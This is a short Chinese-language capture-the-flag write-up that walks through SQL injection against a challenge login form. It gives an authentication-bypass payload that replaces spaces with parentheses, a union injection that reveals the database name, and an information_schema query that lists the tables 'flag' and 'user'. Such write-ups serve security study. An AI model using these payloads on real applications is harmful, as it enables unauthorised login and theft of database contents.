先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输
a'or(true)#
成功登录
既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输
a'or(true)union(select(1),database(),3)#
当前数据库是web2
接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错
a'or(true)union(select(1),
(select(group_concat(table_name))from(information_schema.tables)
where(table_schema='web2'))
,3)#
成功获取数据库中的表 flag , user